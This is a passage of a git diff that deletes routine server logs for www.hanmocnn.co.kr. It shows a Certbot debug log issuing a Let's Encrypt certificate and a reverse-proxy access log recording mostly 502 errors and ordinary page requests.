-Uwp/vV7M4w4aGunt74koX71n4EdagCsL/Yk5+mAQU0+tue0JOfAV/R6t1k+Xk9s2 -HMQFeoxppfzAVC04FdG9M+AC2JWxmFSt6BCuh3CEey3fE52Qrj9YM75rtvIjsm/1 -Hl+u//Wqxnu1ZQ4jpa+VpuZiGOlWrqSP9eogdOhCGisnyewWJwRQOqK16wiGyZeR -xs/Bekw65vwSIaVkBruPiTfMOo0Zh4gVa8/qJgMbJbyrwwG97z/PRgmLKCDl8z3d -tA0Z7qq7fta0Gl24uyuB05dqI5J1LvAzKuWdIjT1tP8qCoxSE/xpix8hX2dt3h+/ -jujUgFPFZ0EVZ0xSyBNRF3MboGZnYXFUxpNjTWPKpagDHJQmqrAcDmWJnMsFY3jS -u1igv3OefnWjSQ== ------END CERTIFICATE----- - -2026-02-14 22:37:11,373:DEBUG:acme.client:Storing nonce: qLPTsdtf7TDw9twhO-dJQIwEaE7M6NSgQWEZQc1cW3y0Qsc0R3I -2026-02-14 22:37:11,374:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 22:37:11,378:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/06c23a86319133c2ea94bad6232b83edc89c/1: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZjdURHc5dHdoTy1kSlFJd0VhRTdNNk5TZ1FXRVpRYzFjVzN5MFFzYzBSM0kiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDZjMjNhODYzMTkxMzNjMmVhOTRiYWQ2MjMyYjgzZWRjODljLzEifQ", - "signature": "uu2PvwRtaxBS1QWdF_MOhZwLzyiYka_x_4ps9bxP_QS3xI9IR7VtV0_neoEBGCLqFCVL3iIIUmsCDLtsXc_u9p_s39ENtIL24UiY_UrmgLvj_HFe8sBxap-xz52WXT_9NYOkaP26eyEsH-17HGQzgEkEJ1DYSqiGEhDKx8nEaOPIKFXvNhxL7nDCgFl2Klcby9cuYQlvnLulhsfKjFPYDc0tB8kx4fxwZ6wQjZ7l3zTP3AicvsUc2AP_4e13k3lkieQtwUebu8Tiv6NvOnQMMBSQwywDa09tXJpyDDWMDbjvAgATPSA1HR4NL3AY4ADE8qRG9zyGx4VTH4pQS9xS7A", - "payload": "" -} -2026-02-14 22:37:11,555:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/06c23a86319133c2ea94bad6232b83edc89c/1 HTTP/1.1" 200 2336 -2026-02-14 22:37:11,555:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:37:11 GMT -Content-Type: application/pem-certificate-chain -Content-Length: 2336 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index", ;rel="alternate" -Replay-Nonce: qLPTsdtfwihD2UbAkXWUlDlC5JvHa190X7NLtkceYR52txIHYoY -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - ------BEGIN CERTIFICATE----- -MIIDrDCCAzGgAwIBAgISBsI6hjGRM8LqlLrWIyuD7cicMAoGCCqGSM49BAMDMDIx -CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF -ODAeFw0yNjAyMTQyMTM4MzhaFw0yNjA1MTUyMTM4MzdaMB0xGzAZBgNVBAMTEnd3 -dy5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABPzAMUvKjO5X -zitBgqZIxSvhrau1vptwO0tb9gqRkNEMlY4JYC03iBAzJn8/61Q6cSTMPQY5WMd5 -3KLX2RapvmpZINQkgfLsxpr+MFWTvWDKoKtTWJp9ft2+mryQYeiYD6OCAh0wggIZ -MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E -AjAAMB0GA1UdDgQWBBTORiT+dlglG67cimuM1zKD3ELnZTAfBgNVHSMEGDAWgBSP -DROi9i5+0VBsMxg4XVmOI3KRyjAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG -Fmh0dHA6Ly9lOC5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISd3d3Lmhhbm1vY25u -LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0 -dHA6Ly9lOC5jLmxlbmNyLm9yZy8yOS5jcmwwggELBgorBgEEAdZ5AgQCBIH8BIH5 -APcAdQBkEcRspBLsp4kcogIuALyrTygH1B41J6vq/tUDyX3N8AAAAZxeTPmgAAAE -AwBGMEQCIGxlMBiH9/OnPSvVEujhbNVUSxq/r1Xngcn4TfBZaVGrAiAkIOVzdb/9 -6AKFMX/ElKQ+7I+hpxNt171wuuDeEjgLkAB+AOMjjfKNoojgquCs8PqQyYXwtr/1 -0qUnsAH8HERYxLboAAABnF5M/BQACAAABQAymAnXBAMARzBFAiEArvxAvG9uE2Tu -DDEeVhOZqlCxIN4TPjui3hiU+mrKZjkCIDizPzKN4wLVM22r8q+oVeOTtAsRHvGX -fwG9AX9le6neMAoGCCqGSM49BAMDA2kAMGYCMQCMzvyXShGR+CTivx802AAWc6AY -gthWXK7x71B1cXqasqwYOiDM+YUFwYHALE+u+iwCMQDMXxRf8NuIx6cPsKSX6vOc -O0tAcvgdvPwBxoXi5cg4Qa96OiXsH8KioJwDWPbj6xs= ------END CERTIFICATE----- - ------BEGIN CERTIFICATE----- -MIICtTCCAjugAwIBAgIQfo8UX4exWTMtf9QIK4JraTAKBggqhkjOPQQDAzBPMQsw -CQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFyY2gg -R3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMjAeFw0yNDAzMTMwMDAwMDBaFw0y -NzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNy -eXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7cS7QM -ApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHbR6ET -oMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB9TAO -BgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMBIG -A1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4jcpHK -MB8GA1UdIwQYMBaAFHxClq7eS0g7+pL4nozPbYupcjeVMDIGCCsGAQUFBwEBBCYw -JDAiBggrBgEFBQcwAoYWaHR0cDovL3gyLmkubGVuY3Iub3JnLzATBgNVHSAEDDAK -MAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDIuYy5sZW5jci5v -cmcvMAoGCCqGSM49BAMDA2gAMGUCMQClsUNJdX36GE+o2yDf7L02m3P3ElVWRLls -5ZyLYPjcNamBxRB9gZYoj24mGZtP3GkCMASZcALg6kpScomqIIjVHXRUQ500cdl4 -4n7fhxwokLo/lVlO8YyHwAi7ejTHtvw9Vg== ------END CERTIFICATE----- - -2026-02-14 22:37:11,555:DEBUG:acme.client:Storing nonce: qLPTsdtfwihD2UbAkXWUlDlC5JvHa190X7NLtkceYR52txIHYoY -2026-02-14 22:37:11,572:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager -2026-02-14 22:37:11,573:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive. -2026-02-14 22:37:11,573:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live. -2026-02-14 22:37:11,573:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/README. -2026-02-14 22:37:11,573:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-1. -2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-1. -2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-1/cert.pem. -2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-1/privkey.pem. -2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-1/chain.pem. -2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-1/fullchain.pem. -2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-1/README. -2026-02-14 22:37:11,585:DEBUG:certbot.configuration:Var account=ce2ddac5740bb12d4d6591b7fa1728af (set by user). -2026-02-14 22:37:11,585:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user). -2026-02-14 22:37:11,585:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user). -2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user). -2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user). -2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user). -2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user). -2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user). -2026-02-14 22:37:11,586:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None -2026-02-14 22:37:11,586:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None -2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user). -2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var webroot_map={'www.hanmocnn.co.kr': '/data/letsencrypt-acme-challenge'} (set by user). -2026-02-14 22:37:11,589:DEBUG:certbot._internal.display.obj:Notifying user: -Successfully received certificate. -Certificate is saved at: /etc/letsencrypt/live/npm-1/fullchain.pem -Key is saved at: /etc/letsencrypt/live/npm-1/privkey.pem -This certificate expires on 2026-05-15. -These files will be updated when the certificate renews. -2026-02-14 22:37:11,589:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS: -2026-02-14 22:37:11,589:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions. -2026-02-14 22:37:11,592:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by: - * Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate - * Donating to EFF: https://eff.org/donate-le diff --git a/npm/data/logs/letsencrypt.log.7 b/npm/data/logs/letsencrypt.log.7 deleted file mode 100644 index e69de29..0000000 diff --git a/npm/data/logs/proxy-host-1_access.log b/npm/data/logs/proxy-host-1_access.log index 5a82420..e3cfcc5 100644 --- a/npm/data/logs/proxy-host-1_access.log +++ b/npm/data/logs/proxy-host-1_access.log @@ -1,5589 +1,745 @@ -[14/Feb/2026:22:37:21 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:22:37:21 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[14/Feb/2026:22:40:05 +0000] - - 301 - HEAD http www.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:22:41:28 +0000] - - 301 - HEAD http www.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:22:43:06 +0000] - - 301 - HEAD http www.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:22:50:21 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:22:50:21 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[14/Feb/2026:22:50:32 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:22:50:32 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[14/Feb/2026:22:51:08 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:22:51:08 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[14/Feb/2026:22:53:09 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:22:53:09 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[14/Feb/2026:22:53:23 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:22:53:23 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[14/Feb/2026:22:55:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8254] [Gzip 5.32] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:22:55:21 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[14/Feb/2026:22:55:21 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[14/Feb/2026:22:55:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4668] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[14/Feb/2026:22:55:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 189] [Gzip 3.12] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[14/Feb/2026:22:57:01 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 91.231.89.122] [Length 166] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[14/Feb/2026:22:59:10 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 91.231.89.123] [Length 154] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[14/Feb/2026:23:04:30 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 91.196.152.153] [Length 154] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[14/Feb/2026:23:04:34 +0000] - - 301 - GET http www.hanmocnn.co.kr "/favicon.ico" [Client 91.196.152.226] [Length 166] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[14/Feb/2026:23:09:54 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 35.204.135.22] [Length 154] [Gzip -] [Sent-to hanmo-home] "Scrapy/2.13.4 (+https://scrapy.org)" "-" -[14/Feb/2026:23:45:26 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 94.247.172.129] [Length 154] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2)" "-" -[14/Feb/2026:23:51:03 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:51:15 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:51:31 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:51:33 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:51:38 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:52:14 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:56:38 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:56:43 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:56:51 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:57:26 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:57:49 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:59:06 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:59:08 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:59:12 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:59:42 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:59:46 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:02:19 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:02:52 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:03:33 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:03:40 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:04:37 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to www.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:04:49 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to www.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:05:16 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to www.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:08:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8241] [Gzip 5.32] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:08:04 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:00:08:04 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:00:08:04 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:00:09:29 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:09:30 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:00:10:21 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows 